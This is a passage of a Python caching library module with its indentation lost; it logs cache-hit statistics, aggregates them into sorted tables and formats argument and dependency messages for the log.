else:
CD = 'C:'
if warn is True:
log.critical('Using directory %s instead' % CD)
return(CD)
checkdir(cachedir, warn=True)
#==============================================================================
# Statistics
#==============================================================================
def addstatsline(CD, funcname, FN, Retrieved, reason, comptime, loadtime,
compression):
"""Add stats entry
USAGE:
addstatsline(CD,funcname,FN,Retrieved,reason,comptime,loadtime,compression)
DESCRIPTION:
Make one entry in the stats file about one cache hit recording time saved
and other statistics. The data are used by the function cachestat.
"""
import os, time
try:
TimeTuple = time.localtime(time.time())
extension = time.strftime('%b%Y',TimeTuple)
SFN = CD+statsfile+'.'+extension
#statfile = open(SFN,'a')
(statfile, dummy) = myopen(SFN,'a',compression=0)
# Change access rights if possible
#
#if unix:
# try:
# exitcode=os.system('chmod 666 '+SFN)
# except:
# pass
except:
log.critical('Warning: Stat file could not be opened')
try:
if 'USER' in os.environ:
user = os.environ['USER']
else:
user = 'Nobody'
date = time.asctime(TimeTuple)
if Retrieved:
hit = '1'
else:
hit = '0'
# Get size of result file
#
if compression:
stats = os.stat(CD+FN+'_'+file_types[0]+'.z')
else:
stats = os.stat(CD+FN+'_'+file_types[0])
if stats:
size = stats[6]
else:
size = -1 # Error condition, but don't crash. This is just statistics
# Build entry
#
entry = date + ',' +\
user + ',' +\
FN + ',' +\
str(int(size)) + ',' +\
str(compression) + ',' +\
hit + ',' +\
str(reason) + ',' +\
str(round(comptime,4)) + ',' +\
str(round(loadtime,4)) +\
CR
statfile.write(entry)
statfile.close()
except:
log.critical('Warning: Writing of stat file failed')
# -----------------------------------------------------------------------------
# FIXME: should take cachedir as an optional arg
#
def __cachestat(sortidx=4, period=-1, showuser=None, cachedir=None):
""" List caching statistics.
USAGE:
__cachestat(sortidx=4,period=-1,showuser=None,cachedir=None):
Generate statistics of caching efficiency.
The parameter sortidx determines by what field lists are sorted.
If the optional keyword period is set to -1,
all available caching history is used.
If it is 0 only the current month is used.
Future versions will include more than one month....
OMN 20/8/2000
"""
import os
import os.path
    # Note: "from string import split, rstrip, find" is Python 2 only;
    # the corresponding str methods are used below instead.
    from time import strptime, localtime, strftime, mktime, ctime, time
# sortidx = 4 # Index into Fields[1:]. What to sort by.
Fields = ['Name', 'Hits', 'Exec(s)', \
'Cache(s)', 'Saved(s)', 'Gain(%)', 'Size']
Widths = [25,7,9,9,9,9,13]
#Types = ['s','d','d','d','d','.2f','d']
Types = ['s','d','.2f','.2f','.2f','.2f','d']
Dictnames = ['Function', 'User']
if not cachedir:
cachedir = checkdir(options['cachedir'])
SD = os.path.expanduser(cachedir) # Expand ~ or ~user in pathname
if period == -1: # Take all available stats
SFILENAME = statsfile
else: # Only stats from current month
# MAKE THIS MORE GENERAL SO period > 0 counts several months backwards!
TimeTuple = localtime(time())
extension = strftime('%b%Y',TimeTuple)
SFILENAME = statsfile+'.'+extension
DIRLIST = os.listdir(SD)
SF = []
for FN in DIRLIST:
        if FN.find(SFILENAME) >= 0:
SF.append(FN)
blocksize = 15000000
total_read = 0
total_hits = 0
total_discarded = 0
firstday = mktime(strptime('2030','%Y'))
    # FIXME: does strptime exist on Windows?
lastday = 0
FuncDict = {}
UserDict = {}
for FN in SF:
input = open(SD+FN,'r')
log.critical('Reading file %s' % SD+FN)
while True:
A = input.readlines(blocksize)
if len(A) == 0: break
total_read = total_read + len(A)
for record in A:
                record = tuple(record.rstrip().split(','))
if len(record) == 9:
timestamp = record[0]
try:
t = mktime(strptime(timestamp))
except:
total_discarded = total_discarded + 1
continue
if t > lastday:
lastday = t
if t < firstday:
firstday = t
user = record[1]
my_F = record[2]
# Strip hash-stamp off
#
                    i = my_F.find('[')
                    my_F = my_F[:i]
                    size = float(record[3])
                    # Compression keyword can be Boolean
if record[4] in ['True', '1']:
compression = 1
elif record[4] in ['False', '0']:
compression = 0
else:
log.critical('Unknown value of compression %s' % str(record[4]))
log.critical(str(record))
total_discarded = total_discarded + 1
continue
#compression = int(record[4]) # Can be Boolean
hit = int(record[5])
reason = int(record[6]) # Not used here
cputime = float(record[7])
loadtime = float(record[8])
if hit:
total_hits = total_hits + 1
saving = cputime-loadtime
if cputime != 0:
rel_saving = round(old_div(100.0*saving,cputime),2)
else:
#rel_saving = round(1.0*saving,2)
rel_saving = 100.0 - round(1.0*saving,2) # A bit of a hack
info = [1,cputime,loadtime,saving,rel_saving,size]
UpdateDict(UserDict,user,info)
UpdateDict(FuncDict,my_F,info)
else:
pass #Stats on recomputations and their reasons could go in here
else:
total_discarded = total_discarded + 1
input.close()
# Compute averages of all sums and write list
#
if total_read == 0:
printline(Widths,'=')
log.critical('CACHING STATISTICS: No valid records read')
printline(Widths,'=')
return
log.critical()
printline(Widths,'=')
log.critical('CACHING STATISTICS: '+ctime(firstday)+' to '+ctime(lastday))
printline(Widths,'=')
log.critical(' Total number of valid records %d' % total_read)
log.critical(' Total number of discarded records %d' % total_discarded)
log.critical(' Total number of hits %d' % total_hits)
log.critical()
log.critical(' Fields %s are averaged over number of hits' % Fields[2:])
log.critical(' Time is measured in seconds and size in bytes')
log.critical(' Tables are sorted by %s' % Fields[1:][sortidx])
if showuser:
Dictionaries = [FuncDict, UserDict]
else:
Dictionaries = [FuncDict]
i = 0
for Dict in Dictionaries:
for key in list(Dict.keys()):
rec = Dict[key]
for n in range(len(rec)):
if n > 0:
rec[n] = round(old_div(1.0*rec[n],rec[0]),2)
Dict[key] = rec
# Sort and output
#
keylist = SortDict(Dict,sortidx)
# Write Header
#
log.critical()
printline(Widths,'-')
n = 0
for s in Fields:
if s == Fields[0]: # Left justify
s = Dictnames[i] + ' ' + s; i=i+1
#exec "print '%-" + str(Widths[n]) + "s'%s,"; n=n+1
log.critical('%-*s' % (Widths[n], s))
n += 1
else:
#exec "print '%" + str(Widths[n]) + "s'%s,"; n=n+1
log.critical('%*s' % (Widths[n], s))
n += 1
log.critical()
printline(Widths,'-')
# Output Values
#
for key in keylist:
rec = Dict[key]
n = 0
if len(key) > Widths[n]: key = key[:Widths[n]-3] + '...'
#exec "print '%-" + str(Widths[n]) + Types[n]+"'%key,";n=n+1
log.critical('%-*s' % (Widths[n], str(key)))
n += 1
for val in rec:
#exec "print '%" + str(Widths[n]) + Types[n]+"'%val,"; n=n+1
                log.critical('%*s' % (Widths[n], str(val)))
n += 1
log.critical()
log.critical()
#==============================================================================
# Auxiliary stats functions
#==============================================================================
def UpdateDict(Dict, key, info):
"""Update dictionary by adding new values to existing.
USAGE:
UpdateDict(Dict,key,info)
"""
if key in Dict:
dinfo = Dict[key]
for n in range(len(dinfo)):
dinfo[n] = info[n] + dinfo[n]
else:
dinfo = info[:] # Make a copy of info list
Dict[key] = dinfo
return Dict
# -----------------------------------------------------------------------------
def SortDict(Dict, sortidx=0):
"""Sort dictionary
USAGE:
SortDict(Dict,sortidx):
DESCRIPTION:
Sort dictionary of lists according field number 'sortidx'
"""
sortlist = []
keylist = list(Dict.keys())
for key in keylist:
rec = Dict[key]
if not isinstance(rec, (list, tuple)):
rec = [rec]
if sortidx > len(rec)-1:
msg = 'ERROR: Sorting index too large, sortidx = %s' % str(sortidx)
raise IndexError(msg)
val = rec[sortidx]
sortlist.append(val)
A = list(zip(sortlist,keylist))
A.sort()
keylist = [x[1] for x in A] # keylist sorted by sortidx
return(keylist)
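
# -----------------------------------------------------------------------------
# Illustrative sketch added as documentation; it is not part of the original
# module and is never called on import. It shows how __cachestat uses
# UpdateDict() to accumulate per-key statistics and SortDict() to order the
# keys by one of the accumulated fields.
def _example_stats_dicts():
    D = {}
    UpdateDict(D, 'domain', [1, 2.5, 0.1])   # hits, cpu time, load time
    UpdateDict(D, 'domain', [1, 3.5, 0.2])
    UpdateDict(D, 'mesh',   [1, 0.5, 0.1])

    print(D['domain'])              # Elementwise sums: [2, 6.0, ~0.3]
    print(SortDict(D, sortidx=1))   # ['mesh', 'domain'] - ascending cpu time
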
# -----------------------------------------------------------------------------
def printline(Widths,char):
"""Print textline in fixed field.
USAGE:
printline(Widths,char)
"""
s = ''
for n in range(len(Widths)):
s = s+Widths[n]*char
if n > 0:
s = s+char
log.critical(s)
#==============================================================================
# Messages
#==============================================================================
def msg1(funcname, args, kwargs, reason):
"""Message 1
USAGE:
msg1(funcname, args, kwargs, reason):
"""
import string
print_header_box('Evaluating function %s' %funcname)
msg7(args, kwargs)
msg8(reason)
print_footer()
# -----------------------------------------------------------------------------
def msg2(funcname, args, kwargs, comptime, reason):
"""Message 2
USAGE:
msg2(funcname, args, kwargs, comptime, reason)
"""
import string
#try:
# R = Reason_msg[reason]
#except:
# R = 'Unknown reason'
#print_header_box('Caching statistics (storing) - %s' %R)
print_header_box('Caching statistics (storing)')
msg6(funcname,args,kwargs)
msg8(reason)
log.critical(str.ljust('| CPU time:', textwidth1) +
str(round(comptime,2)) + ' seconds')
# -----------------------------------------------------------------------------
def msg3(savetime, CD, FN, deps, compression):
"""Message 3
USAGE:
msg3(savetime, CD, FN, deps, compression)
"""
import string
log.critical(str.ljust('| Loading time:', textwidth1) +
str(round(savetime,2)) + ' seconds (estimated)')
msg5(CD,FN,deps,compression)
# -----------------------------------------------------------------------------
def msg4(funcname, args, kwargs, deps, comptime, loadtime, CD, FN, compression):
"""Message 4
USAGE:
msg4(funcname, args, kwargs, deps, comptime, loadtime, CD, FN, compression)
"""
import string
print_header_box('Caching statistics (retrieving)')
msg6(funcname,args,kwargs)
log.critical(str.ljust('| CPU time:', textwidth1) +
str(round(comptime,2)) + ' seconds')
log.critical(str.ljust('| Loading time:', textwidth1) +
str(round(loadtime,2)) + ' seconds')
log.critical(str.ljust('| Time saved:', textwidth1) +
str(round(comptime-loadtime,2)) + ' seconds')
msg5(CD,FN,deps,compression)
# -----------------------------------------------------------------------------
def msg5(CD, FN, deps, compression):
"""Message 5
USAGE:
msg5(CD, FN, deps, compression)
DESCRIPTION:
Print dependency stats. Used by msg3 and msg4
"""
import os, time, string
log.critical('|')
log.critical(str.ljust('| Caching dir: ', textwidth1) + CD)
if compression:
suffix = '.z'
bytetext = 'bytes, compressed'
else:
suffix = ''
bytetext = 'bytes'
for file_type in file_types:
file_name = FN + '_' + file_type + suffix
stats = os.stat(CD+file_name)
log.critical(str.ljust('| ' + file_type + ' file: ', textwidth1) +
file_name + '('+ str(stats[6]) + ' ' + bytetext + ')')
log.critical('|')
if len(deps) > 0:
log.critical('| Dependencies: ')
dependencies = list(deps.keys())
dlist = []; maxd = 0
tlist = []; maxt = 0
slist = []; maxs = 0
for d in dependencies:
stats = deps[d]
t = time.ctime(stats[1])
s = str(stats[0])
#if s[-1] == 'L':
# s = s[:-1] # Strip rightmost 'long integer' L off.
# # FIXME: Unnecessary in versions later than 1.5.2
if len(d) > maxd: maxd = len(d)
if len(t) > maxt: maxt = len(t)
if len(s) > maxs: maxs = len(s)
dlist.append(d)
tlist.append(t)
slist.append(s)
for n in range(len(dlist)):
d = str.ljust(dlist[n]+':', maxd+1)
t = str.ljust(tlist[n], maxt)
s = str.rjust(slist[n], maxs)
log.critical('| %s %s %s bytes' % (d, t, s))
else:
log.critical('| No dependencies')
print_footer()
# -----------------------------------------------------------------------------
def msg6(funcname, args, kwargs):
"""Message 6
USAGE:
msg6(funcname, args, kwargs)
"""
import string
log.critical(str.ljust('| Function:', textwidth1) + funcname)
msg7(args, kwargs)
# -----------------------------------------------------------------------------
def msg7(args, kwargs):
"""Message 7
USAGE:
msg7(args, kwargs):
"""
import string
args_present = 0
if args:
if len(args) == 1:
log.critical(str.ljust('| Argument:', textwidth1) +
mkargstr(args[0], textwidth2))
else:
log.critical(str.ljust('| Arguments:', textwidth1) +
mkargstr(args, textwidth2))
args_present = 1
if kwargs:
if len(kwargs) == 1:
log.critical(str.ljust('| Keyword Arg:', textwidth1) +
mkargstr(kwargs, textwidth2))
else:
log.critical(str.ljust('| Keyword Args:', textwidth1) +
mkargstr(kwargs, textwidth2))
args_present = 1
if not args_present:
log.critical('| No arguments') # Default if no args or kwargs present
# -----------------------------------------------------------------------------
def msg8(reason):
"""Message 8
USAGE:
msg8(reason):
"""
import string
try:
R = Reason_msg[reason]
except:
R = 'Unknown'
log.critical(str.ljust('| Reason:', textwidth1) + R)
# -----------------------------------------------------------------------------
def print_header_box(line):
"""Print line in a nice box.
USAGE:
print_header_box(line)
"""
global textwidth3
import time
time_stamp = time.ctime(time.time())
line = time_stamp + '. ' + line
N = len(line) + 1
s = '+' + '-'*N + CR
log.critical(s + '| ' + line + CR + s)
textwidth3 = N
# -----------------------------------------------------------------------------
def print_footer():
"""Print line same width as that of print_header_box.
"""
N = textwidth3
s = '+' + '-'*N + CR
log.critical(s)
# -----------------------------------------------------------------------------
def mkargstr(args, textwidth, argstr = '', level=0):
""" Generate a string containing first textwidth characters of arguments.
USAGE:
mkargstr(args, textwidth, argstr = '', level=0)
DESCRIPTION:
Exactly the same as str(args) possibly followed by truncation,
but faster if args is huge.
"""
if level > 10:
# Protect against circular structures
return '...'
WasTruncated = 0
if not isinstance(args, (tuple, list, dict)):
if isinstance(args, basestring):
argstr = argstr + "'"+str(args)+"'"
else:
# Truncate large numeric arrays before using str()
if isinstance(args, num.ndarray):
# if len(args.flat) > textwidth:
# Changed by Duncan and Nick 21/2/07 .flat has problems with
# non-contigous arrays and ravel is equal to .flat except it
# can work with non-contiguous arrays
if len(num.ravel(args)) > textwidth:
args = 'Array: ' + str(args.shape)
argstr = argstr + str(args)
else:
if isinstance(args, dict):
argstr = argstr + "{"
for key in list(args.keys()):
argstr = argstr + mkargstr(key, textwidth, level=level+1) + ": " + \
mkargstr(args[key], textwidth, level=level+1) + ", "
if len(argstr) > textwidth:
WasTruncated = 1
break
argstr = argstr[:-2] # Strip off trailing comma
argstr = argstr + "}"
else:
if isinstance(args, tuple):
lc = '('
rc = ')'
else:
lc = '['
rc = ']'
argstr = argstr + lc
for arg in args:
argstr = argstr + mkargstr(arg, textwidth, level=level+1) + ', '
if len(argstr) > textwidth:
WasTruncated = 1
break
# Strip off trailing comma and space unless singleton tuple
#
if isinstance(args, tuple) and len(args) == 1:
argstr = argstr[:-1]
else:
argstr = argstr[:-2]
argstr = argstr + rc
if len(argstr) > textwidth:
WasTruncated = 1
if WasTruncated:
argstr = argstr[:textwidth]+'...'
return(argstr)
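
# -----------------------------------------------------------------------------
# Illustrative sketch added as documentation; it is not part of the original
# module and is never called on import. It shows how mkargstr() renders
# (possibly huge) arguments compactly for the log messages above: large
# arrays are summarised by their shape and the string is truncated at the
# requested width.
def _example_mkargstr():
    args = ([1, 2, 3],
            {'name': 'mesh', 'resolution': 0.25},
            num.zeros(10000))

    # Prints a truncated one-line rendering of the arguments
    print(mkargstr(args, textwidth2))
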
# -----------------------------------------------------------------------------
def logtestOK(msg):
"""Print OK msg if test is OK.
USAGE
logtestOK(message)
"""
import string
log.critical(str.ljust(msg, textwidth4) + ' - OK' )
#raise StandardError
# -----------------------------------------------------------------------------
def logtesterror(msg):
"""Print error if test fails.
USAGE
logtesterror(message)
"""
log.critical('ERROR (caching.test): %s' % msg)
log.critical('Please send this code example and output to ')
log.critical('<EMAIL>')
log.critical()
log.critical()
raise Exception
#-------------------------------------------------------------
if __name__ == "__main__":
pass
|